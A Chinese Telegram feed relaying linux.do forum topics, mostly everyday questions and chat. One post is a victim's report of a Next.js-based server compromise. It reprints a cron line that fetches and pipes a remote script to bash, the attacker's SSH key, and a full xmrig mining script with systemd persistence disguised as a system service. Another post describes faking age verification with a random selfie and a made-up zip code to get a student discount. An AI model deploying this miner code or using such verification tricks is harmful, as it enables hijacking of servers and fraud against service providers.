linux.do
21K subscribers
116K photos
195 videos
115 files
248K links
linux.do最新话题和热议话题
Download Telegram
我实在不理解为什么电脑登陆一定要用到手机

微信、kimi…以及等等😡

9 posts - 9 participants

Read full topic

via LINUX DO - 最新话题 (author: 木瓜蛋白酶Tea🎋)

Invalid media: image
让鬼话连篇重回流量巅峰

自从 道士塌方后,没有故事看了,总觉得少了点什么。所以,我想整个系列之作,让鬼话连篇重回流量巅峰。
今天 就和大家分享一下
道家十不传,八不收

道法十不传

一、不忠不孝之人、不仁不义者不传
二、执迷不误、言语轻狂、自以为是者不传
三、不尊师重道,诽谤道者不传
四、不敬师,不遵规守法者不传
五、心存邪念、贪财轻命、图谋不轨之人不传
六、见色心动好淫乐娼者不传
七、无诚心诚信,与道无缘之人不传
八、不守秘密揭人隐私或泄露天机及道法者不传
九、心怀私念,不懂舍得之道,想不劳而获之人不传
十、仇恨心重、怒火攻心、脾气反常者不传

收徒八规

1、心不信,不信大道,好奇游戏,为徒虚名者不收。
2、心不逆,忤孝背义,悖负亲长,叛辱家国者不收。
3、心不正,只求神通,搬符弄咒,妄求神鬼者不收。
4、心不纯,好求名利,蛊惑众生,以术恣欲者不收。
5、心不善,不怜弱苦,害伤人物,行恶为非者不收。
6、心不定,轻浮狂妄,不待传承,持窃道法者不收。
7、心不坚,不耐苦行,学而不修,虚耗光阴者不收。
8、心不固,学道不专,好参外道,三心二意者不收。

8 posts - 8 participants

Read full topic

via LINUX DO - 最新话题 (author: 送牛奶的)
住院期间如何获得水煮蛋?

家人刚做完手术,医生要求每天吃一个鸡蛋,但是这个医院好像没有便利店之类的地方卖水煮蛋 🫠
医生说每天吃什么都订好了,固定的,但是也不知道具体有什么,不知道具体有没有鸡蛋

本来想的是买一个半导体冰箱+煮蛋器,每天这么煮一个,但是不知道病房里能不能允许放这些东西

坐标上海复旦大学附属华山医院

5 posts - 5 participants

Read full topic

via LINUX DO - 最新话题 (author: 一只羊蝎子)
有没有提供gpt-realtime大模型的站点

有项目需要用到实时语音对话,请问佬友有没有提供gpt-realtime大模型的站点,求推荐!!!

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: LeeXieXie)
可恶的资本主义,但是有点羡慕是怎么回事

感动常在

27 posts - 26 participants

Read full topic

via LINUX DO - 热门话题 (author: 爱心喵)

Invalid media:
image
image
Cursor的这个模型名称我真的绷不住了

我就想知道还能怎么叠
iPhone 17 PlusProMaxUltraElite是吧
22 posts - 19 participants

Read full topic

via LINUX DO - 热门话题 (author: WANGXIANRU)

Invalid media: image
【长期】推荐一些我喜欢的播客

小宇宙小组件每日播客推荐继续讨论,该帖为记录小宇宙组件的每日编辑推荐,新开本帖以区分我本人的推荐。

本帖创建于2025年12月09日,将长期更新一些我喜欢的播客,有时间是我会在每个回复中记录一些我的收获,如果你有喜欢的播客,也欢迎推荐,但希望至少写一个句话介绍一下你推荐的原因😉

注意,佬友们不要再在本帖下面推荐播客频道了,聚焦具体的某一期播客,最好介绍一下你为什么喜欢这一期(哪怕一句话也好)。

11 posts - 9 participants

Read full topic

via LINUX DO - 热门话题 (author: 木瓜蛋白酶Tea🎋)
【警示】我的服务器因为最近的 nextjs 漏洞被黑了

省流:我的服务器被黑客利用最近的next漏洞做成了矿机

我在服务器部署了一个nextjs服务,就我们几个人的小工作室用的工具,没有用docker,是偷懒直接用宝塔部署的,前几天也看到了 nextjs 的漏洞,我以为我这没公开(实际已经挂上域名部署在公网了),没事,就懒得升级了。
结果今天小伙伴问我怎么网站就不去了,我一进网站一看,好家伙,cpu和内存直接给我拉满了:

于是请教 gemini 给我支支招,调查得到以下结果:
grep "CRON" /var/log/syslog

Dec 7 21:40:01 lavm-9sukhghlhp CRON[2275256]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 7 21:41:01 lavm-9sukhghlhp CRON[2275338]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 7 21:42:01 lavm-9sukhghlhp CRON[2275394]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
......
Dec 8 04:07:01 lavm-9sukhghlhp CRON[2310051]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 8 04:08:01 lavm-9sukhghlhp CRON[2310114]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 8 04:09:01 lavm-9sukhghlhp CRON[2310150]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
......

发现从 7 号就开始执行他的恶意脚本了,可惜那个链接现在连不上了
cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDAkjHqyK8n/ZYliklt0BRy4aVHAlCm2PQSWBWyhM9AL root@lavm-9sukhghlhp

发现对方留下的免密登录公钥
/www/wwwroot/finance-workflow-nextjs# ls
app data kal.tar.gz next-env.d.ts payload.so public xmrig-6.24.0
components eslint.config.mjs lib node_modules pnpm-lock.yaml sex.sh
components.json next.config.ts package.json postcss.config.mjs tsconfig.json

发现项目目录中的恶意程序:payload.so, sex.sh, kal.tar.gz, xmrig-6.24.0

sex.sh 的代码为:
#!/bin/bash

# Configuration
TAR_FILE="kal.tar.gz"
EXTRACT_DIR="xmrig-6.24.0"
BINARY_PATH="$(pwd)/$EXTRACT_DIR/xmrig"
ARGS="--url pool.hashvault.pro:443 --user 88tGYBwhWNzGesQs5QkwE1PdBa1tXGb9dcjxrdwujU3SEs3i7psaoJc4KmrDvv4VPTNtXazDWGkvGGfqurdBggvPEhZ43DJ --pass next --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
SERVICE_NAME="system-update-service"

# Download and setup if not already present
if [ ! -f "$BINARY_PATH" ]; then
curl -L -o "$TAR_FILE" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
tar xvzf "$TAR_FILE"
fi

chmod +x "$BINARY_PATH"

# Attempt systemd setup
INSTALLED_SYSTEMD=0
if [ "$(id -u)" -eq 0 ] && command -v systemctl >/dev/null 2>&1; then
echo "Root privileges detected. Attempting systemd setup..."

SERVICE_FILE="/etc/systemd/system/${SERVICE_NAME}.service"

cat <<EOF > "$SERVICE_FILE"
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=${BINARY_PATH} ${ARGS}
Restart=always
RestartSec=10
User=root

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable "$SERVICE_NAME"
systemctl start "$SERVICE_NAME"

if systemctl is-active --quiet "$SERVICE_NAME"; then
echo "Service started via systemd."
INSTALLED_SYSTEMD=1
fi
fi

# Fallback to nohup
if [ $INSTALLED_SYSTEMD -eq 0 ]; then
echo "Starting with nohup..."
nohup "$BINARY_PATH" $ARGS >/dev/null 2>&1 &
fi

以下是 gemini 的分析:

好在数据都还在,没给我库给删了,唉这次是吸取教训了,也是给佬们一个警示吧

我之前真以为即使放到公网上,只要不在网上泄漏自己的域名什么的就没啥事,结果我一看数据,74 个 IP 访问过,实际使用这个站点的就3个人。。。惊了,明白过来真的有脚本能扫描到的

30 posts - 21 participants

Read full topic

via LINUX DO - 热门话题 (author: 雾海藏月)

Invalid media:
image
image
image
image
image
不是甲骨文来真的啊,我也开出来了!!!!

从这个帖子来

卧槽卧槽我甲骨文也终于有了!! 搞七捻三
同样是看到佬友的这个帖子 于是自己也尝试了一下,终于拥有人生第一只龟了!! 方法一模一样 美国地址 ,美国代理,gmail,fiat24的卡,gv 还有这个 [2025-12-09_140148]

我日我日我日,一年了,看着各位佬开我无动于衷,今天心血来潮开了一下
chrome浏览器,无代理,电信家宽,建行visas卡,真实地址姓名电话,日本东京!!!!
顺便说一下这次我没有复制任何信息,纯手打的,祝各位佬冲破龟壳!

坏消息开不出arm 4h24g 目前升级处于abc状态 只能老实开一台amd 1c2g的机子了

123 posts - 64 participants

Read full topic

via LINUX DO - 热门话题 (author: 比特)

Invalid media:
image
image
【已领完】刚知道一直都可以升lv2.。升级了,给各位佬发50个红包

感谢社区。。很久没有混论坛的感觉了,早年自己discuz做论坛。前段时间刚因数据库没续费十几年的站没了=。= 现在新的论坛也玩不太会,总之给大家发小红包庆祝一下 总额100 有50枚红包。在l站也学了好多知识,喜欢这个站,信息量很大,感谢各位大佬分享,作为一个标准的老落伍者也算是找到精神家园了。
zfb红包🐴 61621247
40 posts - 38 participants

Read full topic

via LINUX DO - 热门话题 (author: 知了)
求助佬友SMMS账户被删了可以恢复么,或者有啥更好的存储方案

前几天使用站里的 Z-image 生成了几张图,放在自己的 obsidian 笔记了,但是没有意识到已经设置好图片是直接上传到 smms 的,结果账户被删了,不知道能不能恢复,但是现在几千条笔记已经报废了,有些心累。想问问佬友们有没有什么合适的方案。

大致的想的比较好的方案是这样子的,本地通过 obsidian(文字笔记自动 git 备份。图片太多就图床了)、alist 或者 picgo 一次上传图片,云端自动存储多份,至少双备份,每天会检查 1000 张图片是否有效,没有效就自动重新通过其他有效的连接进行恢复,可以使现有的程序,也可以是自己开发编写代码,可以使用 Cloudflare R2 + 自己域名 + PicGo 上传 +(可选)Lsky Pro 管理后台这种方案。

这个是 AI 弄的一个方案,正在尝试着手搭建看看,不知道可行性如何,如有更好的建议,欢迎各位佬友拍砖。

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: kkkw)
我们家孩子和我说,他的快乐最重要,钱不重要

在和孩子(4 岁半)聊到某个话题时(具体话题我忘了),孩子和我说,他的快乐最重要,钱不重要 🤣

16 posts - 15 participants

Read full topic

via LINUX DO - 最新话题 (author: duoer)
社保局的人突然过来查人是怎么个景?

乐,突然上门让提供证明一个员工是我们公司的员工 🤣

3 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: bayun)
你怎么直接扔治疗药水啊,手册里面不是这么写的

bilibili.com

催眠APP启动!_哔哩哔哩_bilibili

-, 视频播放量 2287518、弹幕量 382、点赞数 193258、投硬币枚数 3354、收藏人数 23671、转发人数 4834, 视频作者 ENX叉叉酱, 作者简介 某宝搜:ENX叉叉酱的小店 ...

:distorted_face:
Minecraft不是这样的
5 posts - 4 participants

Read full topic

via LINUX DO - 最新话题 (author: stevessr backup)

Invalid media:
image
image
image
书接上回,距离AI的地方是输入法

大家好,我基于rime开发了一款ai原生的输入法,想寻求一些建议! 开发调优
[image][image][image][image] (回答错误与否是模型能力问题) tab键联想,command键是句子级别补全,第二次command是调用大模型(多为问句和祈使句格式) 现在的问题在于 在不改变用户原本输入习惯性增加一个AI辅助功能是否可行?用户是否会接受? 我不懂双拼五笔之类的方案,用全拼打一整句话不使用数字键上屏是否是未来输入法的趋势? 本地模…

之前说的基于rime-squirrel开发的ai原生输入法现已开源
仓库地址:GitHub - a1594834522-coder/squirrel-ai: Rime-AI for macOS
目前仅支持macos用户
核心功能:1基于上下文的语句联想,2快如闪电的ai调用(无需打开浏览器或任何应用!)
安装包内已包含输入法本体+雾凇词库集成,开箱即用,配置简单。

本项目完全沿用rime的开源协议,目前的实现逻辑非常简单,有任何好的想法欢迎贡献!
Just for fun

4 posts - 4 participants

Read full topic

via LINUX DO - 最新话题 (author: Abruzz1)

Invalid media:
image
image
IDEA2025.3更新后遇到的奇怪问题

今天更新后从右侧maven工具点击使用任何命令,最后都提示这个编码,手动在终端运行又是正常的,请问这个是要怎么解决

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: irisuare)

Invalid media: image
佬们,老是脖子酸,背疼怎么解决

看一段时间屏幕,脖子到背后就很累。转头都有卡顿滞留感,有什么好办法解决

24 posts - 15 participants

Read full topic

via LINUX DO - 最新话题 (author: HollowKnight)

Invalid media: image
收一个Gemini学生会员账号,支持Antigravity

14 posts - 7 participants

Read full topic

via LINUX DO - 最新话题 (author: 北城)
r2dbc 好像没什么人用啊

🫠 搞个分页都如此复杂,
又不想在代码里面拼接sql

3 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: lhDream)
用flclash不如clash顺滑怎么回事?

有部分链接导入之前一直用的clash不显示,最近下了个FLclash,但我发现用起来卡卡的,换回clash就很顺滑,不知道各位佬友遇没遇到过这种情况?

4 posts - 3 participants

Read full topic

via LINUX DO - 最新话题 (author: XOne)
成功跟着佬友的教程领到了gemini学生优惠

卡的问题算是最复杂的,折腾了一会闲鱼找了一个 8 元的虚拟卡成功开了。
电脑上绑卡要账单地址试了几次失败了,显示 “输入的资料无效”,手机上绑定银行卡只要商家给的卡号,日期,安全码,姓名和邮编,后两项应该可以随便填,我找了个免税区的邮编直接填的。
年龄验证和 ip 纯净决定了能不能通过学生认证后继续申请,我一直用的宝可梦美节点,时好时坏有时候一个浏览器能打开,另一个浏览器显示不可用,还有两次是点完后转圈然后报错,有点难受的,不过最后是完成了。
如果设置好生日后有年龄验证要求可以网上随便找一张自拍就行,审核很松,我是手机配合电脑完成的。
绑卡也尝试了新加坡节点用银联卡但是失败了,换好节点后仍然失败,卡号位数就不同,所以到这一步放弃了,paypal 要美国手机号同样不如直接买虚拟卡。欢迎交流成功经验以及 gemini 用途

4 posts - 3 participants

Read full topic

via LINUX DO - 最新话题 (author: 运行在雪莲果)